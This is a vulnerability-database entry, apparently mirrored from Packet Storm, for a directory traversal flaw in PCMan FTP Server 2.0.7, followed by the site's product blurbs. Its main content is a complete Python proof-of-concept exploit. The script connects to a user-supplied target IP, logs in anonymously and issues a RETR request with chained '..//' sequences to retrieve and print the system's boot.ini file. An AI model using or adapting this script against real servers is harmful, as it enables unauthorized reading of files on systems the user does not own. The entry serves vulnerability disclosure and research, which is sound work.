Lucene search
K

PCMan FTP Server 2.0.7 Directory Traversal

🗓️ 29 Sep 2015 00:00:00Reported by Jay TurlaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

PCMan FTP Server 2.0.7 Directory Traversal, Windows XP SP3, Exploit Cod

Code
`#!/usr/bin/python  
# title: PCMan FTP Server v2.0.7 Directory Traversal  
# author: Jay Turla <@shipcod3>  
# tested on Windows XP Service Pack 3 - English  
# software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z  
# description: PCMAN FTP 2.07 is vulnerable to Directory Traversal (quick and dirty code just for PoC)   
  
from ftplib import FTP  
  
ftp = FTP(raw_input("Target IP: "))   
ftp.login()   
ftp.retrbinary('RETR ..//..//..//..//..//..//..//..//..//..//..//boot.ini', open('boot.ini.txt', 'wb').write)  
ftp.close()  
file = open('boot.ini.txt', 'r')  
print "[**] Printing what's inside boot.ini\n"  
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"  
print file.read()  
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Sep 2015 00:00Current
0.3Low risk
Vulners AI Score0.3
22